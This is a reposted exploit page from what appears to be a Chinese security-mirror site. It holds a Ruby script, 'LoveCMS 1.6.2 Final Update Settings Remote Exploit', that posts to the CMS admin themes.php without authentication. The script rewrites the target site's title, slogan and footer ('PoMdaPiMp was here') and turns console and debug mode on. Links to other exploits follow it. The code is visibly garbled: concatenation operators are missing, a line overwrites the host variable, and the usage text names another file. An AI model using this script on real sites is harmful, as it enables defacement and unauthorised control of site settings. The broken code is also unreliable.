手机
当前位置:查字典教程网 >网络安全 >Exploit >LoveCMS 1.6.2 Final Update Settings Remote Exploit
LoveCMS 1.6.2 Final Update Settings Remote Exploit
摘要:#!/usr/bin/ruby###ExploitbyPoMdaPiMp!##---------------------##pomdapim...

#!/usr/bin/ruby

#

## Exploit by PoMdaPiMp!

## ---------------------

## pomdapimp(at)gmail(dotcom)

##

## LoveCMS Exploit Series

## Episode 3: changing site settings ...

##

## Description: Simply change the site settings !

##

## Usage: ./LoveCMS_3_settings.rb <host>

## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/

##

## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)

#

require 'net/http'

require 'uri'

@host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/'

@post_vars = {}

@post_vars['submit'] = 1

@post_vars['pagetitle'] = 'P4g3T1t1le'

@post_vars['sitename'] = 'SiteN4me'

@post_vars['slogan'] = 'By PoMdaPiMp.'

@post_vars['footer'] = 'PoMdaPiMp was here.'

@post_vars['description'] = 'Ruby is a gift.'

@post_vars['keywords'] = 'PoMdaPiMp, hack'

@post_vars['encoding'] = 'utf-8'

@post_vars['tips'] = 'off'

@post_vars['console'] = 'on'

@post_vars['debugmode'] = 'on'

@post_vars['module'] = 2

@post_vars['love_root'] = ''

@post_vars['love_url'] = ''

@host = ARGV[0] if ARGV[0]

@host = @host[-1, 1].to_s != '/' ? '/' : ''

if @host

# --

puts " LoveCMS Exploit Series. #3: Messing with settings."

puts

puts " : Attacking host: " @host

# --

# Changing settings

res = Net::HTTP.post_form(URI.parse(@host 'system/admin/themes.php'),

@post_vars)

puts " :: Values set."

@post_vars.each do |k, v|

puts " " k.to_s " > " v.to_s

end

# --

puts

puts " - Visit " @host

end

【LoveCMS 1.6.2 Final Update Settings Remote Exploit】相关文章:

MS Internet Explorer (FTP Server Response) DoS Exploit

HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

webEdition CMS (we_objectID) Blind SQL Injection Exploit

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

Maian Music 1.0 Insecure Cookie Handling Vulnerability

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

精品推荐
分类导航